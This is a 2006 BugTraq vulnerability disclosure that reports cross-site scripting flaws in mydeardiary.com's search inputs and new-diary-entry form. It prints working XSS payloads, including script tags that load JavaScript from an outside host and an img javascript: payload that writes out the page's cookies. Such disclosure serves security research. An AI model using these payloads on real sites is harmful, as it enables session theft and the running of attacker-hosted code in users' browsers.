BugTraq
Mydeardiary.com - XSS Jun 12 2006 07:31AM
luny youfucktard com
Mydeardiary.com

Homepage:

http://www.mydeardiary.com

Effected files:

search input boxes

Adding new diary entries

--------------------------------------

We create our XSS example by ending quotes with tags before and after:

">">">'><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<"

Screenshots:

http://www.youfucktard.com/xsp/mydear1.jpg

http://www.youfucktard.com/xsp/mydear2.jpg

------------------------------------

Adding new diary entries XSS vuln:

In the main inputboxof adding a new entry, we can simply put: <SCRIPT SRC=http://youfucktard.com/xs.js></SCRIPT>

to create our XSS example. No filtering needed. When viewing the entry, no popup will occur, but when you go back

and save the entry again then view the entry, you'll see it.

Screenshots:

http://www.youfucktard.com/xsp/mydear3.jpg

http://www.youfucktard.com/xsp/mydear4.jpg

http://www.youfucktard.com/xsp/mydear5.jpg

http://www.youfucktard.com/xsp/mydear6.jpg

Now, to get the popup when viewing the entry instead of just when editing it, we can use <img> tags instead of script

tags:

<IMG SRC=javascript:alert('XSS')>

or try:

<IMG SRC=javascript:document.write(document.cookie)>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus